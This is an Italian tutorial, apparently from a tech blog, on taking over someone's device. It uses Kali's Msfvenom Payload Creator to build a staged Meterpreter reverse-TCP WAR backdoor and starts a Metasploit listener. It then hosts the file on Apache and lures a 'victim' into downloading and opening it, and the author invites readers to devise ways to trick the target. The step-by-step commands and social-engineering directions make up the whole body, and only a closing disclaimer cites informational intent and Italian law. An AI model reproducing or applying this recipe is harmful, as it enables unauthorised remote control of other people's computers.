In questo tutorial parleremo di come hackerare un dispositivo mediante tomcat-meterpreter-staged-reverse-tcp-443-war. Questa fa parte della gamma delle backdoor messe a disposizione dal tool Msfvenom Payload Creator, incluso in Kali Linux; il procedimento per accedere al programma è molto semplice: basterà seguire il percorso Applicazioni>Strumenti di exploiting>Msfvenom Payload Creator. Una volta startata la console di MPC andremo a digitare un primo comando:

/usr/bin/msfpc verbose loop “indirizzo ip locale”

 

 

 

 

 

 

il quale creerà tutte le backdoor che il programma ci mette a disposizione; per venire a conoscenza del nostro indirizzo IP, necessario per l’esecuzione corretta del comando, basterà digitare su di un nuovo terminale il comando “ifconfig”.

 

 

 

 

 

 

Bene, ora possiamo procedere con l’esecuzione di un’altro comando:

msfconsole -q -r ‘/root/tomcat-meterpreter-staged-reverse-tcp-443-war.rc’

 

 

 

 

 

 

 

il quale starterà la console di Metasploit Framework e metterà in ascolto il terminale finchè esso non rileverà la presenza della backdoor sul dispositivo che desideriamo attaccare.

A questo punto andremo nella cartella Home, dove troveremo tutti i file che MPC ci ha forinto per l’attacco; a noi, tuttavia, ci servirà solamente uno, tomcat-meterpreter-staged-reverse-tcp-443.war.

 

 

 

 

 

 

Dato che si tratta di un file zip, clicchiamoci e troverete una cartella contenente questi file

 

 

 

 

 

Clicchiamo sulla cartella “metasploit” e troveremo il payload.class

 

 

 

 

 

Quindi avviamo la procedura d’estrazione del file

 

 

 

 

Successivamente, il file appena estratto, lo trasferiremo nel percorso computer>var>www>html

 

 

 

 

 

 

Svolta questa operazione possiamo quindi aprire un nuovo terminale e mandare in esecuzione il comando service apache2 start.

 

 

 

 

 

 

Ottimo, ora non ci resta che far cliccare la vittima su di un link che abbia questa struttura:

“nostro indirizzo ip”/tomcat-meterpreter-staged-reverse-tcp-443.war”

 

 

 

 

 

 

Dove al posto di “nostro indirizzo ip”andremo ad inserire appunto il nostro IP trovato precedentemente con il comando ifconfig.

Una volta che la vittima avrà fatto click su questo link, le comparirà una piccola scheda che chiederà di scaricare un file sul suo dispositivo; questo file è la nostra tomcat-meterpreter-staged-reverse-tcp-443-war che, una volta eseguito il download e aperto, creerà una sessione tra il dispositivo sotto attacco e il nostro PC, più precisamente con il terminale di Metasploit in ascolto. Per il resto lascio a voi tutta la fantasia per elaborare un metodo efficiente per far cascare la vittima nel tranello.

Ci tengo a precisare che una volta creata la sessione, qualora non siate esperti di comandi, è a vostra disposizione il comando “help” che, eseguito sullo stesso terminale di Metasploit, vi mostrerà tutte le azioni che potrete svolgere sulla macchina remota.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).